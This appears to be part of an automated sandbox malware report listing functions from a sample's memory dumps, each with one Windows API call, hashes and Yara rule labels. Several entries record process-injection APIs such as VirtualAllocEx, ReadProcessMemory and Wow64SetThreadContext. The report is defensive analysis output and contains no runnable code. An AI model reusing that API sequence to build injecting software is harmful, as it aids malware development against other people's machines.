                                                                                    • Opcode ID: b344acfaceff726f2c6c3a8422bfee4870b03a4d71d4f0948a853c00c5d3e7bb
                                                                                    • Instruction ID: 0632a38834645294c9968a46f4c13d3c49b964020629ddc98d50191d22700419
                                                                                    • Opcode Fuzzy Hash: b344acfaceff726f2c6c3a8422bfee4870b03a4d71d4f0948a853c00c5d3e7bb
                                                                                    • Instruction Fuzzy Hash: CB2144B5C002498FCB10CF9AD884BEEBBF4EB48320F11802AE459A7241C378A944CFA5
                                                                                    Function 0139B0B4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0139D66E,?,?,?,?,?), ref: 0139D72F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 9f90d20b7f7b647d520b7751174061bf27b671e3abe8357f08649980843c6827
                                                                                    • Instruction ID: 9f0feada468bdbc0f26ba7e0d5f32e248f1d3418ccce8a0dcae9b6f7d0e7cae6
                                                                                    • Opcode Fuzzy Hash: 9f90d20b7f7b647d520b7751174061bf27b671e3abe8357f08649980843c6827
                                                                                    • Instruction Fuzzy Hash: 302103B5D002489FDB10CF9AD985ADEBBF8EB48310F10801AE918A3310D374A954CFA5
                                                                                    Function 0139D6A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0139D66E,?,?,?,?,?), ref: 0139D72F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 909d2bc799ea90e487db233065eff60f724e7814855ac1573ec79d7818709400
                                                                                    • Instruction ID: 372aa828e8def50a045437f91b682adcf732abb5830ced0fa1f81a8bb692230a
                                                                                    • Opcode Fuzzy Hash: 909d2bc799ea90e487db233065eff60f724e7814855ac1573ec79d7818709400
                                                                                    • Instruction Fuzzy Hash: E62105B5C002499FDB10CF9AD885ADEBFF8FB48314F10801AE918A3250D374A944CF61
                                                                                    Function 058B8698 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 058B8720
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    • Opcode ID: 6f5aae689e122d119b8a20d7e2ba595de76440f490722d842894bba567b3eee7
                                                                                    • Instruction ID: 5efd67e9a89d6218314aa9890f54532c2e7c9af835e47b1a78f545a6bb49a78d
                                                                                    • Opcode Fuzzy Hash: 6f5aae689e122d119b8a20d7e2ba595de76440f490722d842894bba567b3eee7
                                                                                    • Instruction Fuzzy Hash: 832139B1C002499FCB10DF9AC885ADEFBF4FF88310F108429E919A7250C7749954DBA5
                                                                                    Function 058B7FD8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058B805E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: 6b1da7f1f77a7d7900791f5c39f0e96a7a0f9d21e1e2a1a80fb4d2e12c7f074f
                                                                                    • Instruction ID: 83037583c029d39bca2e3a42581e805bf3640072fbfe074bb47ffc31dd03e815
                                                                                    • Opcode Fuzzy Hash: 6b1da7f1f77a7d7900791f5c39f0e96a7a0f9d21e1e2a1a80fb4d2e12c7f074f
                                                                                    • Instruction Fuzzy Hash: D82139B1D002098FDB10DFAAC4857EEBBF8EF88354F548429D919A7241C7789945CFA5
                                                                                    Function 0BE660B8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnumThreadWindows.USER32(?,00000000,?), ref: 0BE66131
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumThreadWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2941952884-0
                                                                                    • Opcode ID: c3200dc89d37ce8dcd6541607e87a7b287653fe9570bb84bbe1f1cbe32c593e2
                                                                                    • Instruction ID: cb8239f169affe098006f7c4595fa466dbb6962c9e3d253a0e4c5eae0de36c35
                                                                                    • Opcode Fuzzy Hash: c3200dc89d37ce8dcd6541607e87a7b287653fe9570bb84bbe1f1cbe32c593e2
                                                                                    • Instruction Fuzzy Hash: 88213871D102498FDB10CFAAC845BEEFBF5EF88350F14842AD459A3250D774A945CF65
                                                                                    Function 058B86A0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 058B8720
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    • Opcode ID: fc611556fb2a552653f0549022f961dec6d1ac52d4345985f46b545a6058d1ea
                                                                                    • Instruction ID: f7a881b5bcaca95508bf0528df6516a1d087c643b66eefb7067835e93df35461
                                                                                    • Opcode Fuzzy Hash: fc611556fb2a552653f0549022f961dec6d1ac52d4345985f46b545a6058d1ea
                                                                                    • Instruction Fuzzy Hash: BE2148B1C003499FCB10DFAAC885ADEFBF4FF88310F108429E919A7240C7749944DBA5
                                                                                    Function 058BD218 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClassInfoW.USER32(?,00000000), ref: 058BD29C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassInfo
                                                                                    • String ID:
                                                                                    • API String ID: 3534257612-0
                                                                                    • Opcode ID: c168370419fc4efdbe893fbb4c682281e6f09eaf0e9482ba0d6d810fd62abead
                                                                                    • Instruction ID: a045bbaa611d05524dd612fe77f0edd516d8f0fde44bf3e7a4470384ecc02158
                                                                                    • Opcode Fuzzy Hash: c168370419fc4efdbe893fbb4c682281e6f09eaf0e9482ba0d6d810fd62abead
                                                                                    • Instruction Fuzzy Hash: D22125B5D017499FDB10CF9AC984BDEFBF8BB48310F14802AE819A7740D374A945CB64
                                                                                    Function 058B7FE0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058B805E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: 4b56fddcd02ce2e9a90b941448bf26c729a71eff3aa248e0cab898dc674882c6
                                                                                    • Instruction ID: 2961aa7153e389115c7c4fa9a8f4bdd1f699fa58224c8efe9bf4b51865970a25
                                                                                    • Opcode Fuzzy Hash: 4b56fddcd02ce2e9a90b941448bf26c729a71eff3aa248e0cab898dc674882c6
                                                                                    • Instruction Fuzzy Hash: E92138B1D003098FDB10DFAAC4857EEBBF8EF88354F10842AD919A7240C7789945CFA1
                                                                                    Function 058BD220 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClassInfoW.USER32(?,00000000), ref: 058BD29C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassInfo
                                                                                    • String ID:
                                                                                    • API String ID: 3534257612-0
                                                                                    • Opcode ID: d243f633655346269548a446bc2c7bac655443e97d8c6b6a997132f75033a058
                                                                                    • Instruction ID: 0ff1b0c838fe2e2f4f1e79d5d22ff672ac8f078ea9cbe59e5a6551d8a4cbc510
                                                                                    • Opcode Fuzzy Hash: d243f633655346269548a446bc2c7bac655443e97d8c6b6a997132f75033a058
                                                                                    • Instruction Fuzzy Hash: BE21D0B5D017499FDB10CF9AD884BDEFBF8BB48310F14842AE959A7340D378A948CB65
                                                                                    Function 076C1F38 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 076C1F65
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2071342526.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 931a6c60fa33d5a56ef1db7c8d6ce40e97aeaa167afa60bd1e3b48c54f9c3b3d
                                                                                    • Instruction ID: 88f18d42f7cecb2ec069cbace2632f67c14342fc0481d9fe19d6d917c5113d84
                                                                                    • Opcode Fuzzy Hash: 931a6c60fa33d5a56ef1db7c8d6ce40e97aeaa167afa60bd1e3b48c54f9c3b3d
                                                                                    • Instruction Fuzzy Hash: 2C113CB43145568FC729AB3DC46487D77EAEF86A5131940AEE602CF3A2EF61CC02C790
                                                                                    Function 0BE660C0 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnumThreadWindows.USER32(?,00000000,?), ref: 0BE66131
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumThreadWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2941952884-0
                                                                                    • Opcode ID: a18805cf5c107dcd1a161c643cdee291c701e656cb69df45a358c32a31831bac
                                                                                    • Instruction ID: 96de48ee097b33f1c1cf69b27ea1f5b5cf4231b1a5da5d925fbba4af4e01a2fb
                                                                                    • Opcode Fuzzy Hash: a18805cf5c107dcd1a161c643cdee291c701e656cb69df45a358c32a31831bac
                                                                                    • Instruction Fuzzy Hash: C62124B1D102498FDB10CF9AC844BEEFBF9EF88360F14842AD459A3250D778A945CFA5
                                                                                    Function 076C1F48 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 076C1F65
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2071342526.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 25d92f3e4eeeec95e7a47c44fc81466aeee7de370bb65dd131bf382e91b68ba8
                                                                                    • Instruction ID: eaf9875ec95626467c86f4c333646da1df4a21d37cb973ce98dda1e7d86233df
                                                                                    • Opcode Fuzzy Hash: 25d92f3e4eeeec95e7a47c44fc81466aeee7de370bb65dd131bf382e91b68ba8
                                                                                    • Instruction Fuzzy Hash: 33110CB43105168FCA18AB3DC42482E77EAEFC6A5071544ADE602CB366EF71DC028790
                                                                                    Function 058B84E8 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 058B855E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: deeaa3f1be5c433460e46fa85a7bf90dc376451cc62c6fca773aeca72adb7de7
                                                                                    • Instruction ID: 55bc5b5785f274b062e860bc8ab48c38b0e888cd7438d4725be4c66464e0e1d9
                                                                                    • Opcode Fuzzy Hash: deeaa3f1be5c433460e46fa85a7bf90dc376451cc62c6fca773aeca72adb7de7
                                                                                    • Instruction Fuzzy Hash: 0B213872C002499FDB10DFAAC845ADEBFF9EB88314F148419D519A7250C775AA44CFA1
                                                                                    Function 058BD138 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 058BD1AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: TextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 530164218-0
                                                                                    • Opcode ID: fb9a19666b976df8d903ba5df61377174c2421728039f4cd21a3cf270dd4b39c
                                                                                    • Instruction ID: 8f77c2ad9fe3fc1affda18f03d44e8566183e9e4c410b8b47c7da2147aa0114b
                                                                                    • Opcode Fuzzy Hash: fb9a19666b976df8d903ba5df61377174c2421728039f4cd21a3cf270dd4b39c
                                                                                    • Instruction Fuzzy Hash: 631136B6C002099FDB14DF9AC844BDEFBF8EB89310F14802AD859A7240C378A549CFA5
                                                                                    Function 0BFA02C8 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0BFA1582,00000000,00000000,03D14128,02D308B0), ref: 0BFA19D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePeek
                                                                                    • String ID:
                                                                                    • API String ID: 2222842502-0
                                                                                    • Opcode ID: 8262d0f0823d2b4a30b3518750ea9fd87a78ba3ee728dc238ff4e1ec5593f968
                                                                                    • Instruction ID: f120cb7fac26d1032fb8b4bea9c99143f15524540124b50618c445ca56035ff3
                                                                                    • Opcode Fuzzy Hash: 8262d0f0823d2b4a30b3518750ea9fd87a78ba3ee728dc238ff4e1ec5593f968
                                                                                    • Instruction Fuzzy Hash: 9E1117B2C043499FCB10DF9AD584BDEBBF8EB48310F11802AE954B3240C378A954DFA5
                                                                                    Function 0BFA02E0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,0BFA160F,00000000,03D14128,02D308B0,00000000,?), ref: 0BFA1D6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 39e32bb80f1182f5cce673482e06757290dd2ab1ed1171816488ec6509fde053
                                                                                    • Instruction ID: cb53003756279b6c6d336d5e2e9a1975768165c36ddfbb794a03dceb6c95ffc8
                                                                                    • Opcode Fuzzy Hash: 39e32bb80f1182f5cce673482e06757290dd2ab1ed1171816488ec6509fde053
                                                                                    • Instruction Fuzzy Hash: 8111E4B2C002499FDB10DF9AD944BDEBBF8EB48311F11842AE959B7240C378A644CFA5
                                                                                    Function 058B84F0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 058B855E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 9a1667597411f06fcd945cc8bf49316887ceae68075e52cabc1c9cb2acf93767
                                                                                    • Instruction ID: 19f9a19c80a6871b0f0c48e2ea602549e2679116bb7662ef372bd68a7103d2ec
                                                                                    • Opcode Fuzzy Hash: 9a1667597411f06fcd945cc8bf49316887ceae68075e52cabc1c9cb2acf93767
                                                                                    • Instruction Fuzzy Hash: 09113772D002499FDB10DFAAC845ADFBFF9EF88324F108419E919A7250C775A954CFA1
                                                                                    Function 058BD140 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 058BD1AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: TextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 530164218-0
                                                                                    • Opcode ID: 57b7761684f805a90c0cec48654876c05fe579f17c20b0a61db532a1246b40c9
                                                                                    • Instruction ID: 7fa35bcd8df888d5cb146829d212013fef800b1192edcffcc327e178f543cb66
                                                                                    • Opcode Fuzzy Hash: 57b7761684f805a90c0cec48654876c05fe579f17c20b0a61db532a1246b40c9
                                                                                    • Instruction Fuzzy Hash: FF1114B6C002499FDB14DF9AC844BDEFBF8EB88310F14802AD859A7240D379A549CFA5
                                                                                    Function 0BFA1D00 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,0BFA160F,00000000,03D14128,02D308B0,00000000,?), ref: 0BFA1D6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: ed84e0dc9e54309d6f3e296b4db730f16279d87a3b89a5820ed70454f126669f
                                                                                    • Instruction ID: 79dd8471c47fa4f27d779b68b1108676b346f94db2d89cea9abc8caaa3c2bc42
                                                                                    • Opcode Fuzzy Hash: ed84e0dc9e54309d6f3e296b4db730f16279d87a3b89a5820ed70454f126669f
                                                                                    • Instruction Fuzzy Hash: B811D0B1C102499FDB10CF9AD985AEEBBF4FB48310F11842AE858A7240C378A645CFA5
                                                                                    Function 0BE66AB0 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?,?,?,?,?,0BE67999,?,?,00000000), ref: 0BE67A0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: 59d4071f561b81c8d6c1731cb5ccda0a5283f6eff0bd9dc5413d194cdb2dcd50
                                                                                    • Instruction ID: 983c05f7f4b120a5faa29ae2165675632f293156c4948284fa15528dba2740f7
                                                                                    • Opcode Fuzzy Hash: 59d4071f561b81c8d6c1731cb5ccda0a5283f6eff0bd9dc5413d194cdb2dcd50
                                                                                    • Instruction Fuzzy Hash: 1D1143B58003499FCB10DF9AD849BDFBFF8EB48354F21845AE858A7200C374A944CFA5
                                                                                    Function 0BE6CAC8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0BE6CB25
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: ff49fffc4462efeb0c3963117dabaf818feda870970efcfaa762e8526fc635fc
                                                                                    • Instruction ID: 230bc1d301ee6b31d46d65c8044de9373840d6fa516c2f763f3a0f1b3feb9d78
                                                                                    • Opcode Fuzzy Hash: ff49fffc4462efeb0c3963117dabaf818feda870970efcfaa762e8526fc635fc
                                                                                    • Instruction Fuzzy Hash: 9A1136B1800349CFDB10CF9AC845BEEFBF8EB48320F108419E558A3240C378A584CFA5
                                                                                    Function 0BE679A8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?,?,?,?,?,0BE67999,?,?,00000000), ref: 0BE67A0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: 1bf4dac33c7b3cce4cb288969138d76784f809610d6857837827c28ae33264e4
                                                                                    • Instruction ID: d38852ca07115d2fd1c3d3f4552de8c10473815b65fbd4ae91b9e3715dc3294a
                                                                                    • Opcode Fuzzy Hash: 1bf4dac33c7b3cce4cb288969138d76784f809610d6857837827c28ae33264e4
                                                                                    • Instruction Fuzzy Hash: 9D1122B5800249DFCB20DF9AD889BDEFBF8EB48354F108419E858A7200C375AA44CFA5
                                                                                    Function 0139B3B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0139B41E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: fd11505d753391ba7a4d9480a070e411493f5ddbc0629dde6b462977e49cd9bc
                                                                                    • Instruction ID: 1a9247ba0a7d807a074f182a02035d6ded24c7b60f1dc9c22434dd663ff7bf00
                                                                                    • Opcode Fuzzy Hash: fd11505d753391ba7a4d9480a070e411493f5ddbc0629dde6b462977e49cd9bc
                                                                                    • Instruction Fuzzy Hash: CC1110B5C002498FDB10CF9AD444ADEFBF4EB88318F10841AD819B7200C375A549CFA1
                                                                                    Function 0BE66ABC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?,?,?,?,?,0BE67999,?,?,00000000), ref: 0BE67A0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: 259cc5c488a4a3f110398620f61ff1fa06f1dd14b5f19c98c5ec16f64d7d1c41
                                                                                    • Instruction ID: 50ce9f135e169843e5b17a3752169573399afa9db0d04d997ab1ee324d7e05f4
                                                                                    • Opcode Fuzzy Hash: 259cc5c488a4a3f110398620f61ff1fa06f1dd14b5f19c98c5ec16f64d7d1c41
                                                                                    • Instruction Fuzzy Hash: FD1122B58003499FCB10DF9AD989BDEFBF8EB48354F108419E918A7200C375A944CFA5
                                                                                    Function 052C54B9 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetTimer.USER32(?,02CC6428,?,?,?,?,?,?,052C5378,00000000,00000000,?), ref: 052C551D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070032798.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_52c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: Timer
                                                                                    • String ID:
                                                                                    • API String ID: 2870079774-0
                                                                                    • Opcode ID: 3a30a02757dde69c10cb0d985c9df4679b54f5c374b2ce391399d7bfeb31fc29
                                                                                    • Instruction ID: 985fb154e4d9458c5c846911c9ddc6b385270bea5b9274d3f9cb5cb184c1976f
                                                                                    • Opcode Fuzzy Hash: 3a30a02757dde69c10cb0d985c9df4679b54f5c374b2ce391399d7bfeb31fc29
                                                                                    • Instruction Fuzzy Hash: 031122B58103499FCB10DF9AD889BDEBFF8EB48310F10845AE919A7200C375A544CFA1
                                                                                    Function 052C4EA8 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetTimer.USER32(?,02CC6428,?,?,?,?,?,?,052C5378,00000000,00000000,?), ref: 052C551D
